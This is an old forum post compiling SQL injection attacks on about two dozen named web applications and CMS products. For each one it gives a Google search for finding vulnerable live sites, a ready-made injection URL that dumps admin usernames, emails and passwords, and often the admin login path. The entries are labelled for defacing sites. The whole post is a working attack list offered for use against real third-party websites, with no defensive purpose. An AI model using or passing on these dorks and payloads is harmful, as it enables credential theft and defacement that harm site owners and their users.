Complete SQL Injection (all the injections)

Started by R1D4R, 13 December 2008, 20:02 PM

R1D4R

Here I leave this compilation of the different types of injections I found. All of them have been tested by me, and of course, although it is somewhat hard to find some sites with this vulnerability, they do exist ;)

Deface Fundlink SQL
What to search for on Google: allinurl: "fundlinkllc.com"
SQL injection: showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users

Deface PHP-Newsletter (cat_id) SQL
What to search for on Google: llinurl: "index.php?pgid"cat_id
SQL injection: index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1

Deface Powered by Com Endeavors SQL
Google search: allinurl: "index.php?go=detail"
SQL injection: index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*where,limit,2--

Deface Powered by niccell SQL
Google search: "powered by niccell"
SQL injection: list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,concat(login,0x3a,password),444+from+admin_login/*

Deface KwsPHP v1.3.456 SQL
Google search: "index.php?mod=galerie"action=gal
SQL injection: index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*

Deface Powered by Esy SQL
Google search: "Powered by Esy"
SQL injection: sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
SQL injection 2: sections.php?op=printpage&artid=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*

Deface showresult
Google search: allinurl: "index.php?p=poll"showresult
SQL injection: index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user

Deface powered by koobi-cms 4.3.0
Google search: Koobi CMS 4.3.0: "powered by koobi-cms 4.3.0"
SQL injection: index.php?area=1&p=gallery&action=showimages&galid=[SQL]
THIS ONE FOR THE ADMIN: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*

Deface Powered by BosClassifieds Classified Ads System
Google search: "Powered by BosClassifieds Classified Ads System"
SQL injection: site.c0m/bosclassifieds/index.php?cat=[SQL]
Only for version: BosClassifieds 3.0

Deface Powered by SmallBiz eShop
Google search: Powered by SmallBiz eShop
SQL injection: index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(5,8)user(),char(5,version()),char)/*

Deface pollBooth
Google search: allinurl: "pollBooth.php?op=results"pollID
SQL injection: pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users

Deface RS MAXSOFT
Google search: "RS MAXSOFT"
SQL injection: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
Admin Login: admin.php?page=logfrm

Deface gallerypic img
Google search: allinurl: "index.php?p=gallerypic img_id"
SQL injection: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user
SQL injection 2: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user
Admin Login: login=admin/login.php

Deface Powered By SSWD
Google search: allinurl: "index.php?go=subcat"
SQL injection: index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*

Deface Powered by OpenLD
Google search: "Powered by OpenLD"
SQL injection: index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null  ,null,null,null,null/**/FROM/**/settings--

Deface Index php P Shop
Google search: allinurl: "index php p shop"categ
SQL injection: index.php?p=shop&show=showdetail&fid=ulus&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

Deface Powered by Site Sift
Google search 1: powered by Site Sift
Google search 2: allinurl: "index php go addpage"
Google search 3: allinurl: "index.php?go=detail id="
SQL injection 1: index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*
SQL injection 2: index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
Admin Login: admin/login.php

Deface Showlink
Google search: allinurl: "index.php?showlink"links
SQL injection: index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

Deface Powered by eSyndiCat
Google search: © 2005-2006 Powered by eSyndiCat Directory Software
SQL injection: news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
Admin Login: from%20dir_admins/*

Deface CartWeaver
Google search: allinurl:Results.cfm?category=
SQL injection to get the admin's name: Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20admin_username%20from%20tbl_adminuser s))
SQL injection to get the password: Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20char(97)%2badmin_password%20from%20tb l_adminusers))
Admin Login: /cw2/admin/

Deface Bwired
Google search: "Powered by bwired" inurl:?newsID=
SQL injection: index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser

Deface Powered by Md-Pro
Google search: "Powered by Md-Pro"
SQL injection: index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*

Deface Browse Blogs by Category
Google search: allintext:"Browse Blogs by Category"
SQL injection: index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*

Deface eMeeting Online Dating Software 5.2
Google search: allintext:"Home Member Search Chat Room Forum Help/Support privacy policy"
SQL injection 1: b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
SQL injection 2: b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*

Deface FlashGameScript 1.7
Google search: "Powered by FlashGameScript"
SQL injection 1: index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+ from+members+where+user_type=2/*
SQL injection 2: index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,user_type+fr om+members+where+user_type=2/*